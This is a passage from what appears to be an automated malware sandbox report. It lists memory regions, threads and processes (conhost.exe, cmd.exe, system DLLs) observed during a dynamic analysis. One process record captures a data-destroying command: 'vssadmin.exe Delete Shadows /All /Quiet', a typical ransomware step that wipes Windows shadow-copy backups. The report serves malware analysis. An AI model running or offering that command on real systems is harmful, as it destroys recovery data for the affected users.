	            name = "pagefile_0x00007df5ff5c0000"
	        filename = ""

Region:
	              id = 1167
	        start_va = 0x7ff7fee90000
	          end_va = 0x7ff7feeb2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fee90000"
	        filename = ""

Region:
	              id = 1168
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 1169
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1170
	        start_va = 0x230a6750000
	          end_va = 0x230a69cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a6750000"
	        filename = ""

Region:
	              id = 1175
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 1186
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 1187
	        start_va = 0x230a6710000
	          end_va = 0x230a671ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a6710000"
	        filename = ""

Region:
	              id = 1188
	        start_va = 0x7ff7fed90000
	          end_va = 0x7ff7fee8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fed90000"
	        filename = ""

Region:
	              id = 1189
	        start_va = 0x230a6750000
	          end_va = 0x230a680dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1190
	        start_va = 0x230a68d0000
	          end_va = 0x230a69cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a68d0000"
	        filename = ""

Region:
	              id = 1191
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 1192
	        start_va = 0xcc29470000
	          end_va = 0xcc294affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000cc29470000"
	        filename = ""

Region:
	              id = 1197
	        start_va = 0x230a6810000
	          end_va = 0x230a688ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a6810000"
	        filename = ""

Region:
	              id = 1198
	        start_va = 0x230a6720000
	          end_va = 0x230a6726fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a6720000"
	        filename = ""

Region:
	              id = 1199
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 1200
	        start_va = 0x230a6810000
	          end_va = 0x230a6810fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a6810000"
	        filename = ""

Region:
	              id = 1201
	        start_va = 0x230a6880000
	          end_va = 0x230a688ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a6880000"
	        filename = ""

Region:
	              id = 1202
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 1203
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 1204
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 1205
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 1206
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 1207
	        start_va = 0x230a6820000
	          end_va = 0x230a6826fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a6820000"
	        filename = ""

Region:
	              id = 1222
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 1223
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 1224
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 1225
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 1226
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 1247
	        start_va = 0x230a6830000
	          end_va = 0x230a6830fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a6830000"
	        filename = ""

Region:
	              id = 1248
	        start_va = 0x230a6840000
	          end_va = 0x230a6840fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a6840000"
	        filename = ""

Region:
	              id = 1249
	        start_va = 0x230a69d0000
	          end_va = 0x230a6b57fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a69d0000"
	        filename = ""

Region:
	              id = 1250
	        start_va = 0x230a6b60000
	          end_va = 0x230a6ce0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a6b60000"
	        filename = ""

Region:
	              id = 1251
	        start_va = 0x230a6cf0000
	          end_va = 0x230a80effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a6cf0000"
	        filename = ""

Region:
	              id = 1252
	        start_va = 0x230a80f0000
	          end_va = 0x230a81effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a80f0000"
	        filename = ""

Region:
	              id = 1259
	        start_va = 0xcc294b0000
	          end_va = 0xcc294effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000cc294b0000"
	        filename = ""

Region:
	              id = 1260
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 1261
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 1262
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 1281
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 1282
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 1283
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 1284
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 1285
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 1286
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 1301
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 1302
	        start_va = 0x230a80f0000
	          end_va = 0x230a816ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a80f0000"
	        filename = ""

Region:
	              id = 1303
	        start_va = 0x230a81e0000
	          end_va = 0x230a81effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a81e0000"
	        filename = ""

Region:
	              id = 1349
	        start_va = 0x230a81f0000
	          end_va = 0x230a8526fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1350
	        start_va = 0x230a6850000
	          end_va = 0x230a6870fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 1351
	        start_va = 0x230a80f0000
	          end_va = 0x230a8149fff
	       monitored = 1
	     entry_point = 0x230a81053f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 1352
	        start_va = 0x230a8160000
	          end_va = 0x230a816ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a8160000"
	        filename = ""

Region:
	              id = 1366
	        start_va = 0x230a8530000
	          end_va = 0x230a8745fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a8530000"
	        filename = ""

Region:
	              id = 1372
	        start_va = 0x230a8750000
	          end_va = 0x230a8969fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a8750000"
	        filename = ""

Region:
	              id = 1373
	        start_va = 0x230a8970000
	          end_va = 0x230a8a7afff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a8970000"
	        filename = ""

Region:
	              id = 1374
	        start_va = 0x230a8a80000
	          end_va = 0x230a8c9dfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a8a80000"
	        filename = ""

Region:
	              id = 1382
	        start_va = 0x230a8ca0000
	          end_va = 0x230a8db7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a8ca0000"
	        filename = ""

Region:
	              id = 1439
	        start_va = 0xcc294f0000
	          end_va = 0xcc2952ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000cc294f0000"
	        filename = ""

Region:
	              id = 1440
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 1441
	        start_va = 0x230a6850000
	          end_va = 0x230a6850fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a6850000"
	        filename = ""

Region:
	              id = 1442
	        start_va = 0x230a8dc0000
	          end_va = 0x230a8e7bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a8dc0000"
	        filename = ""

Region:
	              id = 1443
	        start_va = 0x230a6850000
	          end_va = 0x230a6853fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a6850000"
	        filename = ""

Region:
	              id = 1444
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 1452
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 1453
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 1486
	        start_va = 0x230a6860000
	          end_va = 0x230a6866fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a6860000"
	        filename = ""

Region:
	              id = 1487
	        start_va = 0x230a6870000
	          end_va = 0x230a6870fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a6870000"
	        filename = ""

Region:
	              id = 1488
	        start_va = 0x230a6890000
	          end_va = 0x230a6890fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a6890000"
	        filename = ""

Region:
	              id = 1489
	        start_va = 0x230a68a0000
	          end_va = 0x230a68a4fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 1490
	        start_va = 0x230a68b0000
	          end_va = 0x230a68b0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 1496
	        start_va = 0x230a68c0000
	          end_va = 0x230a68c1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a68c0000"
	        filename = ""

Region:
	              id = 1497
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 1498
	        start_va = 0x230a80f0000
	          end_va = 0x230a80f0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 1499
	        start_va = 0x230a8100000
	          end_va = 0x230a8101fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a8100000"
	        filename = ""


Thread:
	id = 53
	os_tid = 0xf1c


Thread:
	id = 55
	os_tid = 0x1320


Thread:
	id = 60
	os_tid = 0xf38


Thread:
	id = 69
	os_tid = 0xfec


Process:
	id = "18"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x319d1000"
	os_pid = "0xf50"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "2"
	os_parent_pid = "0xd78"
	cmd_line = "vssadmin.exe  Delete Shadows /All /Quiet"
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1329
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1330
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 1331
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 1332
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 1333
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 1334
	        start_va = 0x850000
	          end_va = 0x851fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000850000"
	        filename = ""

Region:
	              id = 1335
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 1336
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 1337
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1338
	        start_va = 0x7f690000
	          end_va = 0x7f6b2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f690000"
	        filename = ""

Region:
	              id = 1339
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1340
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1341
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 1342
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1343
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 1344
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 1345
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 1346
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 1354
	        start_va = 0x400000
	          end_va = 0x5dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1367
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1368
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1369
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1376
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1377
	        start_va = 0x4880000
	          end_va = 0x4a5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 1378
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1401
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1402
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1403
	        start_va = 0x7f590000
	          end_va = 0x7f68ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f590000"
	        filename = ""

Region:
	              id = 1459
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1460
	        start_va = 0x850000
	          end_va = 0x853fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000850000"
	        filename = ""

Region:
	              id = 1461
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 1462
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1463
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1464
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1465
	        start_va = 0x5d0000
	          end_va = 0x5dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005d0000"
	        filename = ""

Region:
	              id = 1466
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 1467
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 1468
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 1469
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 1470
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
